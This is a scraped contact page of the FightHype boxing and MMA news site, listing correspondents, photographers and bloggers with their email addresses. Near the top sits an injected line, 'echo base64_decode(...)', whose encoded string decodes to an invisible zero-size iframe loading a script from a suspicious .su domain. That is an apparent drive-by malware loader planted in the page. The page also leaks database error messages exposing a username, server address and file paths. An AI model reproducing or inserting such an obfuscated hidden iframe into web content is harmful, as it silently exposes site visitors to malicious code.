BOXING MMA BOTH
echo base64_decode("PGlmcmFtZSBzcmM9Imh0dHA6Ly93d3cudXBkYXRlLXNob2Nrd2F2ZTM0LnN1L3Nydi94cm0ucGhwIiB3aWR0aD0iMCIgaGVpZ2h0PSIwIj4=");

CONTACT US

Do you have a question, comment or suggestion? If so, send us an email at customerservice@fighthype.com or feel free to contact any of the correspondents and/or administrators directly via their email address listed below.

FightHype.com is always looking for more talented writers, videographers, photographers and correspondents. If you're interested in covering fights and speaking with the biggest names in boxing and mixed martial arts, please contact the editor at editor@fighthype.com.

TEAM FIGHTHYPE CORRESPONDENTS
[ authorized to cover events ]

Adrian "Ace" Valdez .............................. press@fighthype.com
Andre Zurbrug .............................. azurbrug@fighthype.com
Andrew Potter .............................. apotter@fighthype.com
Ben Thompson .............................. bthompson@fighthype.com
Billy Ferguson .............................. billy_ferguson@hotmail.co.uk
Brittany Rogers .............................. press@fighthype.com
Charles Peterson .............................. cpeterson@fighthype.com
Corey Quincy .............................. cquincy@fighthype.com
David Kassel .............................. dkassel@fighthype.com
David Reon Nguyen .............................. dnguyen@fighthype.com
Duv Johal .............................. press@fighthype.com
Felix Strunk .............................. fstrunk@fighthype.com
Fernando Pimentel .............................. fernpimentel@hotmail.com
Gary Reynolds .............................. greynolds@fighthype.com
Giovangel Perez .............................. gperez@fighthype.com
Gregory Bloom, Esq. .............................. greg@chaselawyers.com
Jack Herbert .............................. press@fighthype.com
Jacqueline Purcell .............................. press@fighthype.com
James Alden .............................. jalden@fighthype.com
Joel Medina .............................. press@fighthype.com
John Russell .............................. jrussell@fighthype.com
Jon Reynoso .............................. jreynoso@fighthype.com
Jonathan Shrager .............................. press@fighthype.com
Josh Morgan .............................. press@fighthype.com
Kuda Love .............................. press@fighthype.com
Luke Moore .............................. lukemoore4@hotmail.com
Michael Samuels .............................. msamuels@fighthype.com
Michelle Rosado .............................. mrosado@fighthype.com
Mike Juhas .............................. mjuhas@fighthype.com
Mike Pielaet-Strayer .............................. mpielaetstayer@fighthype.com
Percy Crawford .............................. pcrawford@fighthype.com
Ronnie Duncan .............................. customerservice@fighthype.com
Scott Smith .............................. ssmith@fighthype.com
Sevak Sarkisian .............................. sevaksarkisian@aol.com
Stuart Warren Dansby .............................. dansbydirt@fighthype.com
Sylvana Ambrosanio .............................. sambrosanio@fighthype.com
Ted Peterson .............................. tpeterson@fighthype.com


TEAM FIGHTHYPE VIDEOGRAPHERS/PHOTOGRAPHERS
[ authorized to cover events ]

Charles Presnell .............................. cpresnell@fighthype.com
Daniel Perez .............................. press@fighthype.com
Lamont Joseph .............................. press@fighthype.com
Miguel Santana .............................. press@fighthype.com
Nick Sanchez .............................. nsanchez@fighthype.com
Paul Tedjosukmono .............................. sansan@fighthype.com
Raphael Baker .............................. press@fighthype.com
Simon Ruvalcaba .............................. sruvalcaba@fighthype.com
Tai Nguyen .............................. press@fighthype.com


TEAM FIGHTHYPE COMMUNITY ADMINISTRATORS

Jack Plato .............................. jplato@fighthype.com


TEAM FIGHTHYPE BLOGGERS

Andre Ward .............................. asogward@fighthype.com
Austin Trout .............................. nodoubt@fighthype.com
Billy Briscoe .............................. blogger@fighthype.com
Eric Samson .............................. esamson@fighthype.com
Joe Riggs .............................. press@fighthype.com
Peter Quillin .............................. kidchocolate@fighthype.com
Seckbach's World .............................. eseckbach@fighthype.com
The Heyman Hustle .............................. pheyman@fighthype.com


FLOYDMAYWEATHER.COM
BOXING 360
MP8.PH
Ecko MMA

Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'fighthype'@'50.63.194.17' (using password: YES) in /home/content/12/5695812/html/includes/ibf_latest_topic.php on line 56

Warning: mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /home/content/12/5695812/html/includes/ibf_latest_topic.php on line 58

JOIN THE FIGHTHYPE COMMUNITY

LOG IN | REGISTER

STEALTH BODYBUILDING
FIGHTHYPE RADIO SHOW
DEVYDORS CIGAR EMPORIUM
THE EMPIRE SPORTS & ENTERTAINMENT
FIGHTHYPE YOUTUBE
FOLLOW FIGHTHYPE ON TWITTER
FIGHTHYPE ON TWITTER
GRANT BOXING